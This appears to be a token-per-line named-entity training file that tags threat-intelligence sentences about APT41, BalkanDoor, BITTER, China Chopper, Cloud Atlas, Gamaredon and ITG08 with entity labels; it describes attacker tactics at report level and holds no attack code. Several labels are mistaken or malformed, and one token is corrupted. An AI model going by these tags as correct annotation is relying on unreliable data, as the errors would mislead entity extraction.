+malware O +observed O +in O +supply O +chain O +compromises O +in O +2017 S-TIME +and O +2018 S-TIME +. O +In O +May B-TIME +2016 E-TIME +, O +APT41 S-APT +deployed O +a O +POISONPLUG O +sample O +at O +a O +U.S.-based O +game O +development O +studio O +. O +Alternatively O +, O +it O +is O +also O +possible O +that O +APT41 S-APT +injected B-ACT +malicious I-ACT +code E-ACT +into O +the O +package O +prior O +to O +compilation O +, O +circumventing O +the O +need O +to O +steal O +the O +code-signing O +certificate O +and O +compile O +it O +on O +their O +own O +. 
O +Either O +APT41 S-APT +is O +operating O +outside O +of O +state O +control O +but O +still O +working O +with O +other O +Chinese O +APT O +malware O +actors S-LOC +, O +tools O +, O +and O +infrastructure O +on O +a O +parttime O +or O +contractual O +basis O +, O +or O +APT41 S-APT +is O +a O +full-time O +. O +APT41 S-APT +uses O +many O +of O +the O +same O +tools O +and O +compromised O +digital B-MAL +certificates E-MAL +that O +have O +been O +leveraged O +by O +other O +Chinese O +espionage O +operators O +. O +Initial O +reports O +about O +HIGHNOON S-FILE +and O +its O +variants O +reported O +publicly O +as O +Winnti S-APT +dating O +back O +to O +at O +least O +2013 S-TIME +indicated O +the O +tool O +was O +exclusive O +to O +a O +single O +group O +, O +contributing O +to O +significant O +conflation O +across O +multiple O +distinct O +espionage O +operations O +. O +APT41 S-APT +has O +used O +several O +malware O +families O +that O +have O +also O +been O +used O +by O +other O +Chinese O +espionage O +operators O +, O +including O +variants O +of O +HIGHNOON S-MAL +, O +HOMEUNIX S-MAL +, O +PHOTO S-MAL +, O +SOGU S-MAL +, O +and O +ZXSHELL S-MAL +, O +among O +others O +. O +HIGHNOON S-MAL +, O +one O +of O +the O +main O +code O +families O +observed O +being O +used O +by O +APT41 S-APT +, O +was O +also O +used O +by O +APT17 S-APT +in O +2015 O +to O +target O +semiconductor S-IDTY +and O +chemical B-IDTY +manufacturers E-IDTY +. O +HOMEUNIX S-MAL +, O +another O +popular O +backdoor S-MAL +used O +by O +APT41 S-APT +, O +has O +been O +used O +by O +at O +least O +14 O +separate O +Chinese S-LOC +espionage O +groups S-APT +, O +including O +APT1 S-APT +, O +APT10 S-APT +, O +APT17 S-APT +, O +APT18 S-APT +, O +and O +APT20 S-APT +. O +APT41 S-APT +has O +used O +CROSSWALK.BIN S-MAL +, O +a O +kernel O +driver O +, O +to O +circumvent O +firewalls O +and O +covertly O +send O +data O +. 
O +Another O +Chinese O +espionage S-ACT +group O +used O +a O +similar O +tool O +, O +CLASSFON S-MAL +, O +to O +covertly O +proxy O +network O +communications O +in O +2011 S-TIME +. O +At O +least O +two O +of O +these O +malware O +families O +, O +HIGHNOON.CLI S-MAL +and O +GEARSHIFT S-MAL +, O +have O +been O +used O +by O +APT17 S-APT +and O +another O +suspected O +Chinese O +espionage O +group O +. O +APT41 S-APT +regularly O +leverages S-ACT +code-signing B-MAL +certificates E-MAL +to O +sign O +malware O +when O +targeting O +both O +gaming O +and O +nongaming B-IDTY +organizations E-IDTY +. O +In O +July B-TIME +2017 E-TIME +, O +APT41 S-APT +initiated O +a O +TeamViewer O +session O +and O +transferred O +files O +that O +were O +later O +deleted O +. O +In O +these O +instances O +, O +APT41 S-APT +leveraged O +TeamViewer S-MAL +to O +transfer O +malware O +into O +the O +compromised O +environment O +, O +although O +we O +do O +not O +have O +direct O +evidence O +of O +APT41 S-APT +compromising O +TeamViewer O +. O +In O +May B-TIME +2018 E-TIME +, O +APT41 S-APT +used O +TeamViewer S-MAL +for O +initial O +entry O +in O +the O +compromise O +of O +a O +healthcare S-IDTY +company S-IDTY +. O +Notably O +, O +APT41 S-APT +was O +observed O +using B-ACT +proof-of-concept E-ACT +exploit S-VULNAME +code O +for O +CVE-2019-3396 S-VULID +within O +23 O +days O +after O +the O +Confluence O +. O +APT41 S-APT +has O +targeted O +payment B-IDTY +services E-IDTY +specializing O +in O +handling O +in-game O +transactions O +and O +real O +money O +transfer O +(RMT) O +purchases O +. O + +The O +group O +will O +also O +use B-ACT +a I-ACT +compromised I-ACT +account E-ACT +to O +create O +scheduled O +tasks O +on O +systems O +or O +modify S-ACT +legitimate O +Windows S-OS +services O +to O +install O +the O +HIGHNOON S-MAL +and O +SOGU B-MAL +backdoors E-MAL +. 
O +APT41 S-APT +uses O +multiple O +methods O +to O +perform O +lateral O +movement O +in O +an O +environment O +, O +including O +RDP B-ACT +sessions E-ACT +, O +using B-ACT +stolen I-ACT +credentials E-ACT +, O +adding B-ACT +accounts E-ACT +to O +User O +and O +Admin O +groups O +, O +and O +password B-ACT +brute-forcing I-ACT +utilities E-ACT +. O +To O +maintain O +presence O +, O +APT41 S-APT +relies O +on O +backdoors O +, O +a O +Sticky B-MAL +Keys E-MAL +vulnerability O +, O +scheduled B-MAL +tasks E-MAL +, O +bootkits S-MAL +, O +rootkits S-MAL +, O +registry B-MAL +modifications E-MAL +, O +and O +creating O +or O +modifying O +startup O +files O +. O +APT41 S-APT +leveraged O +ROCKBOOT S-MAL +as O +a O +persistence O +mechanism O +for O +PHOTO O +and O +TERA O +backdoors O +. O +APT41 S-APT +has O +also O +been O +observed O +modifying B-ACT +firewall I-ACT +rules E-ACT +to O +enable O +file O +and O +printer O +sharing O +to O +allow O +for O +inbound O +Server B-TOOL +Message I-TOOL +Block E-TOOL +(SMB) S-TOOL +traffic O +. O + +In O +some O +instances O +, O +APT41 S-APT +leveraged O +POISONPLUG S-MAL +as O +a O +first-stage O +backdoor O +to O +deploy O +the O +HIGHNOON B-MAL +backdoor E-MAL +in O +the O +targeted O +environment O +. O +The O +group O +also O +deploys S-ACT +the O +SOGU O +and O +CROSSWALK O +malware O +families O +as O +means O +to O +maintain O +presence O +. O +APT41 S-APT +sent O +spear-phishing S-ACT +emails S-TOOL +to O +multiple O +HR O +employees O +three O +days O +after O +the O +compromise O +had O +been O +remediated O +and O +systems O +were O +brought O +back O +online O +. O +APT41 S-APT +also O +deploys O +the O +SOGU S-MAL +and O +CROSSWALK S-MAL +malware O +families O +as O +means O +to O +maintain O +presence O +. 
O +Within O +hours O +of O +a O +user O +opening O +the O +malicious O +attachment O +dropping O +a O +HOMEUNIX B-MAL +backdoor E-MAL +, O +APT41 S-APT +regained O +a O +foothold O +within O +the O +environment O +by O +installing O +PHOTO S-MAL +on O +the O +organization's O +servers O +across O +multiple O +geographic O +regions O +. O +Before O +attempting O +to O +deploy O +the O +publicly O +available O +Ransomware-as-a-Service O +(RaaS) O +Encryptor O +RaaS O +through O +group O +policy O +, O +APT41 S-APT +blocked O +victim O +systems O +from O +retrieving O +anti-virus O +updates O +by O +accessing S-ACT +the O +DNS S-PROT +management O +console O +and O +implementing O +a O +forward O +lookup O +on O +the O +domain O +used O +for O +anti-virus O +updates O +to O +the O +park O +IP S-PROT +address O +1.1.1.1 O +. O +APT41 S-APT +has O +been O +observed O +creating S-ACT +a O +RAR O +archive O +of O +targeted O +files O +for O +Exfiltration S-ACT +. O +APT41 S-APT +is O +unique O +among O +tracked O +China-based O +actors S-LOC +in O +that O +it O +leverages S-ACT +non-public O +malware O +typically O +reserved O +for O +espionage O +campaigns O +in O +what O +appears O +to O +be O +activity O +for O +personal O +gain O +. O +During O +multiple O +engagements O +, O +APT41 S-APT +attempted O +to O +remove O +evidence O +of O +some O +of O +its O +activity O +by O +deleting B-ACT +Bash I-ACT +histories E-ACT +, O +clearing B-ACT +Windows I-ACT +security E-ACT +and O +system O +events O +, O +and O +modifying B-ACT +DNS I-ACT +management E-ACT +to O +avoid B-ACT +anti-virus I-ACT +detections E-ACT +. O +Explicit O +financially-motivated O +targeting O +is O +unusual O +among O +Chinese B-LOC +statesponsored E-LOC +threat O +groups O +, O +and O +evidence O +suggests O +APT41 S-APT +has O +conducted O +simultaneous O +cyber O +crime O +and O +Cyber B-ACT +Espionage E-ACT +operations O +from O +2014 S-TIME +onward O +. 
O +APT41 S-APT +operations O +against O +higher B-IDTY +education E-IDTY +, O +travel B-IDTY +services E-IDTY +, O +and O +news/media B-IDTY +firms E-IDTY +provide O +some O +indication O +that O +the O +group O +also O +tracks O +individuals O +and O +conducts O +surveillance O +. O +For O +example O +, O +the O +group O +has O +repeatedly O +targeted O +call O +record O +information O +at O +telecom S-IDTY +companies S-IDTY +. O +APT41 S-APT +has O +established O +and O +maintained O +strategic O +access O +to O +organizations O +in O +the O +healthcare S-IDTY +, O +high-tech S-IDTY +, O +and O +telecommunications S-IDTY +sectors S-IDTY +. O +The O +group’s O +financially O +motivated O +activity O +has O +primarily O +focused O +on O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +, O +where O +APT41 S-APT +has O +manipulated S-ACT +virtual O +currencies O +and O +even O +attempted O +to O +deploy S-ACT +ransomware S-ACT +. O +In O +another O +instance O +, O +APT41 S-APT +targeted O +a O +hotel’s O +reservation O +systems O +ahead O +of O +Chinese O +officials O +staying O +there O +, O +suggesting O +the O +group O +was O +tasked O +to O +reconnoiter O +the O +facility O +for O +security O +reasons O +. O +These O +supply B-ACT +chain E-ACT +compromise O +tactics O +have O +also O +been O +characteristic O +of O +APT41’s S-APT +best O +known O +and O +most O +recent O +espionage O +campaigns O +. O +Interestingly O +, O +despite O +the O +significant O +effort O +required O +to O +execute O +supply O +chain O +compromises O +and O +the O +large O +number O +of O +affected O +organizations O +, O +APT41 S-APT +limits S-ACT +the O +deployment O +of O +follow-on O +malware O +to O +specific O +victim O +systems O +by O +matching S-ACT +against O +individual O +system O +identifiers O +. 
O +Mapping O +the O +group’s O +activities O +since O +2012 O +(Figure O +2) O +also O +provides O +some O +indication O +that O +APT41 S-APT +primarily O +conducts S-ACT +financially O +motivated O +operations O +outside O +of O +their O +normal O +day O +jobs O +. O +The O +latter O +is O +especially O +notable O +because O +APT41 S-APT +has O +repeatedly O +returned O +to O +targeting O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +and O +we O +believe O +these O +activities O +were O +formative O +in O +the O +group’s O +later O +espionage O +operations O +. O +APT41 S-APT +leverages O +an O +arsenal O +of O +over O +46 O +different O +malware B-MAL +families E-MAL +and O +tools S-MAL +to O +accomplish O +their O +missions O +, O +including O +publicly O +available O +utilities O +, O +malware O +shared O +with O +other O +Chinese O +espionage O +operations O +, O +and O +tools O +unique O +to O +the O +group O +. O +Once O +in O +a O +victim O +organization O +, O +APT41 S-APT +can O +leverage S-ACT +more O +sophisticated O +TTPs O +and O +deploy B-ACT +additional I-ACT +malware E-ACT +. O +APT41 S-APT +often O +relies O +on O +spear-phishing S-ACT +emails S-TOOL +with O +attachments O +such O +as O +compiled O +HTML S-TOOL +( O +.chm S-FILE +) O +files O +to O +initially O +compromise O +their O +victims O +. O + +APT41 S-APT +has O +also O +deployed B-ACT +rootkits E-ACT +and O +Master B-TOOL +Boot I-TOOL +Record E-TOOL +(MBR) S-TOOL +bootkits O +on O +a O +limited O +basis O +to O +hide O +their O +malware O +and O +maintain O +persistence O +on O +select O +victim O +systems O +. O +The O +limited O +use O +of O +these O +tools O +by O +APT41 S-APT +suggests O +the O +group O +reserves O +more O +advanced O +TTPs O +and O +malware O +only O +for O +high-value O +targets O +. 
O +Like O +other O +Chinese O +espionage O +operators O +, O +APT41 S-APT +appears O +to O +have O +moved O +toward O +strategic O +intelligence O +collection O +and O +establishing O +access O +and O +aACT O +from O +direct O +intellectual O +property O +theft O +since O +2015 S-TIME +. O +This O +shift O +, O +however O +, O +has O +not O +affected O +the O +group's S-APT +consistent O +interest O +in O +targeting O +the O +video B-IDTY +game I-IDTY +industry E-IDTY +for O +financially O +motivated O +reasons O +. O +BalkanRAT S-FILE +enables O +the O +attacker O +to O +remotely O +control O +the O +compromised O +computer O +via O +a O +graphical O +interface O +, O +i.e. O +, O +manually; O +BalkanDoor S-FILE +enables O +them O +to O +remotely O +control O +the O +compromised O +computer O +via O +a O +command O +line O +, O +i.e. O +, O +possibly O +en O +masse O +. O +With O +the O +contents O +of O +the O +emails S-TOOL +, O +included O +links O +and O +decoy O +PDFs O +all O +involving O +taxes O +, O +the O +attackers S-APT +are O +apparently O +targeting O +the O +financial S-IDTY +departments O +of O +organizations O +in O +the O +Balkans S-LOC +region O +. O +Some O +parts O +of O +the O +campaign O +were O +briefly O +described O +by O +a O +Serbian B-SECTEAM +security E-SECTEAM +provider O +in O +2016 S-TIME +and O +the O +Croatian O +CERT O +in O +2017 S-TIME +. O +The O +campaign O +has O +been O +active O +at O +least O +from O +January S-TIME +2016 S-TIME +to O +the O +time O +of O +writing O +the O +most O +recent O +detections O +in O +our O +telemetry O +are O +from O +July O +2019 S-TIME +. O +Our O +findings O +show O +that O +the O +mentioned O +attacks S-APT +have O +been O +orchestrated O +and O +we O +consider O +them O +a O +single O +long-term O +campaign O +that O +spans O +Croatia S-LOC +, O +Serbia S-LOC +, O +Montenegro S-LOC +, O +and O +Bosnia S-LOC +and O +Herzegovina S-LOC +. 
O +We’ve O +discovered O +a O +new O +version O +of O +BalkanDoor S-APT +with O +a O +new O +method O +for O +execution/installation: O +an O +exploit S-VULNAME +of O +the O +WinRAR S-TOOL +ACE O +vulnerability O +CVE-2018-20250 S-VULID +. O +Both O +BalkanRAT S-FILE +and O +BalkanDoor S-FILE +spread O +in O +Croatia S-LOC +, O +Serbia S-LOC +, O +Montenegro S-LOC +, O +and O +Bosnia S-LOC +and O +Herzegovina S-LOC +. O +According O +to O +our O +telemetry O +, O +the O +campaign O +spreading O +these O +tools O +has O +been O +live O +since O +2016 S-TIME +, O +with O +the O +most O +recent O +detections O +as O +late O +as O +in O +July B-TIME +2019 E-TIME +. O +In O +some O +of O +the O +latest O +samples O +of O +BalkanDoor S-FILE +detected O +in O +2019 S-TIME +, O +the O +malware O +is O +distributed O +as O +an O +ACE O +archive O +, O +disguised O +as O +a O +RAR O +archive O +(i.e. O +, O +not O +an O +executable O +file) O +, O +specially O +crafted O +to O +exploit S-VULNAME +the O +WinRAR S-TOOL +ACE O +vulnerability O +CVE-2018-20250 S-VULID +. O +Via O +the O +BalkanDoor O +backdoor O +, O +the O +attacker S-APT +sends O +a O +backdoor O +command O +to O +unlock O +the O +screen… O +and O +using O +BalkanRAT S-MAL +, O +they O +can O +do O +whatever O +they O +want O +on O +the O +computer O +. O +The O +BalkanDoor B-MAL +backdoor E-MAL +does O +not O +implement O +any O +Exfiltration S-ACT +channel O +. O +APT41 S-APT +leveraged O +ADORE.XSEC S-MAL +, O +a O +Linux S-OS +backdoor O +launched O +by O +the O +Adore-NG O +rootkit O +, O +throughout O +an O +organization's O +Linux S-OS +environment O +. O +The O +backdoor S-FILE +can O +connect O +to O +any O +of O +the O +C&Cs O +from O +a O +hardcoded O +list O +– O +a O +measure O +to O +increase O +resilience O +. O +The O +main O +part O +of O +the O +BalkanRAT B-FILE +malware E-FILE +is O +a O +copy O +of O +the O +Remote O +Utilities O +software O +for O +remote B-ACT +access E-ACT +. 
O +Interestingly O +, O +some O +of O +the O +APT41's S-APT +POISONPLUG S-MAL +malware O +samples O +leverage O +the O +Steam O +Community O +website O +associated O +with O +Valve O +, O +a O +video O +game O +developer O +and O +publisher O +. O +The O +campaign O +targeting O +accountants O +in O +the O +Balkans O +shows O +some O +similarities O +with O +a O +campaign O +aimed O +at O +Ukrainian S-LOC +notaries O +reported O +in O +2016 S-TIME +. O +Based O +on O +the O +Let’s O +Encrypt S-SECTEAM +certificate O +issuance O +date O +, O +we O +believe O +this O +campaign O +to O +be O +active O +from O +May B-TIME +2019 E-TIME +. O +One O +of O +the O +domains O +uncovered O +during O +the O +investigation O +was O +identified O +by O +the O +Chinese O +security O +vendor O +CERT B-SECTEAM +360 E-SECTEAM +as O +being O +part O +of O +the O +BITTER B-APT +APT E-APT +campaign O +in O +May B-TIME +2019 E-TIME +. O +Further O +analysis O +of O +the O +BITTER B-APT +APT’s E-APT +infrastructure O +uncovered O +a O +broader O +phishing E-ACT +campaign O +targeting O +other O +government B-IDTY +sites E-IDTY +and O +state-owned O +enterprises S-IDTY +in O +China S-LOC +. O +Further O +investigation O +revealed O +approximately O +40 O +additional O +sites O +, O +all O +of O +which O +appear O +to O +be O +targeting O +the O +government S-IDTY +of O +China S-LOC +and O +other O +organisations S-IDTY +in O +China S-LOC +. O +We O +expect O +to O +see O +BITTER B-APT +APT E-APT +continuing O +to O +target O +the O +government S-IDTY +of O +China S-LOC +by O +employing O +spoofed O +login O +pages O +designed O +to O +steal O +user O +credentials O +and O +obtain O +access O +to O +privileged O +account O +information O +. 
O +This O +domain O +and O +IP S-PROT +address O +has O +been O +previously O +associated O +with O +the O +BITTER B-APT +APT E-APT +and O +targeting O +government B-IDTY +agencies E-IDTY +in O +China S-LOC +with O +phishing B-ACT +attacks E-ACT +, O +based O +on O +reporting O +from O +360-CERT S-SECTEAM +. O +At O +the O +time O +of O +analysis O +, O +the O +subdomains O +did O +not O +host O +a O +website; O +however O +, O +based O +on O +BITTER B-APT +APT E-APT +group’s O +targeting O +patterns O +, O +it O +is O +highly O +likely O +that O +they O +were O +created O +to O +host O +faux O +login O +phishing E-ACT +pages O +designed O +to O +steal O +user’s O +credentials O +. O +BITTER B-APT +APT E-APT +campaigns O +are O +primarily O +targeting O +China S-LOC +, O +Pakistan S-LOC +and O +Saudi B-LOC +Arabia E-LOC +historically O +. O +As O +part O +of O +its O +ongoing O +research O +initiatives O +, O +the O +Anomali S-SECTEAM +Threat O +Research O +Team O +has O +discovered O +a O +new O +phishing S-ACT +attack O +leveraging O +spoof O +sites O +that O +seem O +to O +be O +designed O +to O +steal O +email S-TOOL +credentials O +from O +the O +target O +victims O +within O +the O +government O +of O +the O +People’s O +Republic O +of O +China S-LOC +. O +360 B-SECTEAM +Threat I-SECTEAM +Intelligence I-SECTEAM +Center E-SECTEAM +has O +reported O +on O +related O +indicators O +being O +attributed O +to O +BITTER B-APT +APT E-APT +a O +South B-LOC +Asian E-LOC +country O +suspected O +Indian O +APT O +in O +open O +source O +reporting O +. O +China B-MAL +Chopper E-MAL +is O +a O +tool O +that O +has O +been O +used O +by O +some O +state-sponsored O +actors O +such O +as O +Leviathan S-APT +and O +Threat B-APT +Group-3390 E-APT +, O +but O +during O +our O +investigation O +we've O +seen O +actors O +with O +varying O +skill O +levels O +. 
O +China B-FILE +Chopper E-FILE +is O +a O +tool O +that O +allows O +attackers S-APT +to O +remotely O +control O +the O +target O +system O +that O +needs O +to O +be O +running O +a O +web O +server O +application O +before O +it O +can O +be O +targeted O +by O +the O +tool O +. O +Cisco B-SECTEAM +Talos E-SECTEAM +discovered O +significant O +China B-MAL +Chopper E-MAL +activity O +over O +a O +two-year O +period O +beginning O +in O +June B-TIME +2017 E-TIME +, O +which O +shows O +that O +even O +nine O +years O +after O +its O +creation O +, O +attackers S-APT +are O +using O +China B-MAL +Chopper E-MAL +without O +significant O +modifications O +. O +Here O +, O +we O +investigate O +a O +campaign O +targeting O +an O +Asian S-LOC +government B-IDTY +organization E-IDTY +. O +We O +observed O +another O +campaign O +targeting O +an O +organisation O +located O +in O +Lebanon S-LOC +. O +China B-FILE +Chopper E-FILE +contains O +a O +remote O +shell O +( O +Virtual B-TOOL +Terminal E-TOOL +) O +function O +that O +has O +a O +first O +suggested O +command O +of O +netstat O +an|find O +ESTABLISHED O +. O +They O +download O +and O +install O +an O +archive O +containing O +executables O +and O +trivially O +modified O +source O +code O +of O +the O +password-stealing O +tool O +Mimikatz B-FILE +Lite E-FILE +as O +GetPassword.exe S-FILE +. O +The O +tool S-FILE +investigates O +the O +Local O +Security O +Authority O +Subsystem O +memory O +space O +in O +order O +to O +find O +, O +decrypt O +and O +display O +retrieved O +passwords O +. O +The O +actor S-APT +attempts O +to O +exploit S-VULNAME +CVE-2018–8440 S-VULID +— O +an O +elevation O +of O +privilege O +vulnerability S-VULNAME +in O +Windows S-OS +when O +it O +improperly O +handles O +calls O +to O +Advanced O +Local O +Procedure O +Call O +— O +to O +elevate O +the O +privileges O +using O +a O +modified O +proof-of-concept S-VULNAME +exploit S-VULNAME +. 
O +The O +attacker S-APT +obtains O +the O +required O +privileges O +and O +launches O +a O +few O +other O +tools O +to O +modify S-ACT +the O +access O +control O +lists O +(ACLs) O +of O +all O +websites O +running O +on O +the O +affected O +server O +. O +The O +Windows S-OS +branch O +of O +the O +Cloud B-APT +Atlas E-APT +intrusion O +set O +still O +uses O +spear-phishing S-ACT +emails S-TOOL +to O +target O +high O +profile O +victims O +. O +From O +the O +beginning O +of O +2019 O +until O +July O +, O +we O +have O +been O +able O +to O +identify O +different O +spear-phishing S-ACT +campaigns S-ACT +related O +to O +this O +threat O +actor O +mostly O +focused O +on O +Russia S-LOC +, O +Central B-LOC +Asia E-LOC +and O +regions O +of O +Ukraine S-LOC +with O +ongoing O +military O +conflicts O +. O +We O +described O +one O +of O +the O +techniques O +used O +by O +Cloud B-APT +Atlas E-APT +in O +2017 S-TIME +and O +our O +colleagues O +at O +Palo B-SECTEAM +Alto E-SECTEAM +Networks O +also O +wrote O +about O +it O +in O +November B-TIME +2018 E-TIME +. O +The O +China B-FILE +Chopper E-FILE +actor O +activity O +starts O +with O +the O +download O +and O +execution O +of O +two O +exploit S-VULNAME +files O +which O +attempt O +to O +exploit S-VULNAME +the O +Windows S-OS +vulnerabilities O +CVE-2015-0062 S-VULID +, O +CVE-2015-1701 S-VULID +and O +CVE-2016-0099 S-VULID +to O +allow O +the O +attacker S-APT +to O +modify O +other O +objects O +on O +the O +server O +. O +Previously O +, O +Cloud B-APT +Atlas E-APT +dropped O +its O +validator” O +implant O +named O +PowerShower” O +directly O +, O +after O +exploiting O +the O +Microsoft S-IDTY +Equation O +vulnerability O +CVE-2017-11882 S-VULID +mixed O +with O +CVE-2018-0802 S-VULID +. O +This O +malware O +has O +been O +used O +since O +October B-TIME +2018 E-TIME +by O +Cloud B-APT +Atlas E-APT +as O +a O +validator O +and O +now O +as O +a O +second O +stage O +. 
O +Cloud B-APT +Atlas E-APT +remains O +very O +prolific O +in O +Eastern B-LOC +Europe E-LOC +and O +Central B-LOC +Asia E-LOC +. O +During O +its O +recent O +campaigns O +, O +Cloud B-APT +Atlas E-APT +used O +a O +new O +polymorphic” O +infection B-ACT +chain E-ACT +relying O +no O +more O +on O +PowerShower O +directly O +after O +infection O +, O +but O +executing O +a O +polymorphic O +HTA O +hosted O +on O +a O +remote O +server O +, O +which O +is O +used O +to O +drop O +three O +different O +files O +on O +the O +local O +system O +. O +The O +Gamaredon B-APT +Group E-APT +has O +been O +actively O +launching O +spear-phishing S-ACT +attacks E-ACT +against O +Ukrainian S-LOC +government S-IDTY +and O +military S-IDTY +departments O +from O +the O +mid-2013s S-TIME +. O +In O +addition O +, O +the O +anonymous O +cybersecurity O +experts O +referenced O +in O +the O +article O +connected O +the O +malicious O +Gamaredon B-APT +Group E-APT +actors O +with O +Russian S-LOC +state-sponsored O +hackers O +. O +In O +one O +article O +published O +in O +the O +Kharkiv O +Observer O +– O +an O +independent O +Ukranian S-LOC +online O +publication O +– O +an O +unnamed O +source O +stated O +that O +even O +the O +Ukrainian O +Presidential B-IDTY +Administration E-IDTY +has O +been O +attacked O +by O +malware O +developed O +by O +the O +Gamaredon B-APT +Group E-APT +. O +Gamaredon B-APT +Group E-APT +primarily O +target O +Ukrainian O +organizations S-IDTY +and O +resources O +using O +spear-phishing S-ACT +attacks O +, O +and O +they O +use O +military O +or O +similar O +documents S-MAL +as O +bait O +. O +Once O +they S-APT +have O +found O +a O +victim O +, O +they O +then O +deploy O +remote O +manipulation O +system O +binaries O +(RMS) S-MAL +via O +self-extracting O +archives O +and O +batch O +command O +files O +. 
O +The O +following O +archive S-FILE +caught O +our O +attention O +for O +exploiting O +a O +WinRAR S-TOOL +unacev2 O +module O +vulnerability S-VULNAME +and O +for O +having O +interesting O +content O +. O +During O +a O +recent O +incident O +response O +investigation O +, O +our O +team O +identified O +new O +attacks O +by O +the O +financially O +motivated O +attack O +group O +ITG08 S-APT +, O +also O +known O +as O +FIN6 S-APT +. O +More O +recently O +, O +ITG08 S-APT +has O +been O +observed O +targeting O +e-commerce B-IDTY +environments E-IDTY +by O +injecting B-ACT +malicious I-ACT +code E-ACT +into O +online O +checkout O +pages O +of O +compromised O +websites O +— O +a O +technique O +known O +as O +online O +skimming O +— O +thereby O +stealing O +payment O +card O +data O +transmitted O +to O +the O +vendor O +by O +unsuspecting O +customers O +. O +This O +tool O +, O +a O +TTP O +observed O +in O +ITG08 S-APT +attacks O +since O +2018 S-TIME +, O +is O +sold O +on O +the O +dark O +web O +by O +an O +underground O +malware-as-a-service O +(MaaS) O +provider O +. O +ITG08 S-APT +is O +an O +organized O +cybercrime O +gang O +that O +has O +been O +active O +since O +2015 S-TIME +, O +mostly O +targeting O +pointof-sale O +(POS) O +machines O +in O +brick-and-mortar O +retailers S-IDTY +and O +companies O +in O +the O +hospitality B-IDTY +sector E-IDTY +in O +the B-LOC +U.S. E-LOC +and O +Europe S-LOC +. O +Past O +campaigns O +by O +ITG08 S-APT +using O +the O +More_eggs B-MAL +backdoor E-MAL +were O +last O +reported O +in O +February B-TIME +2019 E-TIME +. O +Attackers S-APT +use O +it O +to O +create O +, O +expand S-ACT +and O +cement S-ACT +their O +foothold O +in O +compromised O +environments O +. O +Lastly O +, O +ITG08 S-APT +used O +Comodo B-MAL +code-signing I-MAL +certificates E-MAL +several O +times O +during O +the O +course O +of O +the O +campaign O +. 
O +Let’s O +take O +a O +closer O +look O +at O +ITG08’s S-APT +TTPs O +that O +are O +relevant O +to O +the O +campaign O +we O +investigated O +, O +starting O +with O +its O +spear B-ACT +phishing E-ACT +and O +intrusion B-ACT +tactics E-ACT +and O +covering B-ACT +information E-ACT +on O +its O +use O +of O +the O +More_eggs B-FILE +backdoor E-FILE +. O +Additional O +capabilities O +of O +the O +More_eggs B-FILE +malware E-FILE +include O +the O +download O +and O +execution O +of O +files O +and O +scripts O +and O +running O +commands O +using O +cmd.exe S-FILE +. O +X-Force B-SECTEAM +IRIS E-SECTEAM +determined O +that O +the O +More_eggs B-FILE +backdoor E-FILE +later O +downloaded O +additional O +files O +, O +including O +a O +signed O +binary O +shellcode O +loader O +and O +a O +signed O +Dynamic B-TOOL +Link I-TOOL +Library E-TOOL +( O +DLL S-TOOL +) O +, O +as O +described O +below O +, O +to O +create O +a O +reverse O +shell O +and O +connect O +to O +a O +remote O +host O +. O +Once O +the O +ITG08 S-APT +established O +a O +foothold O +on O +the O +network O +, O +they O +employed O +WMI S-MAL +and O +PowerShell S-MAL +techniques O +to O +perform O +network O +reconnaissance O +and O +move O +laterally O +within O +the O +environment O +. O +The O +attackers S-APT +used O +this O +technique O +to O +remotely O +install S-ACT +a O +Metasploit O +reverse O +TCP S-PROT +stager O +on O +select O +systems O +, O +subsequently O +spawning O +a O +Meterpreter O +session O +and O +Mimikatz O +. O +In O +addition O +to O +the O +More_eggs S-MAL +malware O +, O +ITG08 S-APT +leveraged O +in-memory O +attacks O +by O +injecting O +malicious O +code O +, O +in O +this O +case O +Mimikatz S-MAL +, O +into O +legitimate O +system O +processes O +. O +A O +recently O +rising O +attack O +tool O +in O +ITG08 S-APT +campaigns O +has O +been O +the O +More_eggs B-MAL +JScript I-MAL +backdoor E-MAL +. 
O +Mimikatz S-FILE +is O +a O +post-exploitation O +tool O +that O +allows O +attackers O +to O +extract O +credentials O +from O +volatile O +memory O +. O +After O +a O +successful O +phishing E-ACT +attack O +in O +which O +users O +have O +opened O +emails S-TOOL +and O +browsed O +to O +malicious O +links O +, O +ITG08 S-APT +attackers O +install S-ACT +the O +More_eggs B-MAL +JScript I-MAL +backdoor E-MAL +on O +user O +devices O +alongside O +several O +other O +malware O +components O +. O +Beyond O +using O +More_eggs S-MAL +as O +a O +backdoor O +, O +ITG08 S-APT +in O +this O +campaign O +also O +used O +offensive B-MAL +security I-MAL +tools E-MAL +and O +PowerShell B-MAL +scripts E-MAL +to O +carry O +out O +the O +different O +stages O +of O +the O +attack O +. O +After O +injecting B-ACT +Meterpreter E-ACT +into O +memory O +, O +the O +attacker S-APT +had O +complete O +control O +of O +the O +infected O +device O +. O +IBM B-SECTEAM +X-Force I-SECTEAM +IRIS E-SECTEAM +has O +gained O +insight O +into O +ITG08’s S-APT +intrusion O +methods O +, O +ability O +to O +navigate O +laterally O +, O +use O +of O +custom O +and O +open-source O +tools S-MAL +, O +and O +typical O +persistence O +mechanisms O +. O +After O +the O +phishing B-ACT +email E-ACT +resulted O +in O +a O +successful O +infiltration O +, O +ITG08 S-APT +used O +the O +More_eggs B-MAL +backdoor E-MAL +to O +gain O +a O +foothold O +and O +infect O +additional O +devices O +. O +In O +addition O +, O +configuring O +PowerShell S-TOOL +script O +logging O +and O +identifying O +any O +obfuscation O +will O +assist O +in O +mitigating O +ITG08’s S-APT +use O +of O +PowerShell S-MAL +to O +conduct O +malicious O +activity O +. O +The O +LYCEUM S-APT +threat O +group O +targets O +organizations O +in O +sectors O +of O +strategic B-IDTY +national I-IDTY +importance E-IDTY +, O +including O +oil B-IDTY +and I-IDTY +gas E-IDTY +and O +possibly O +telecommunications S-IDTY +. 
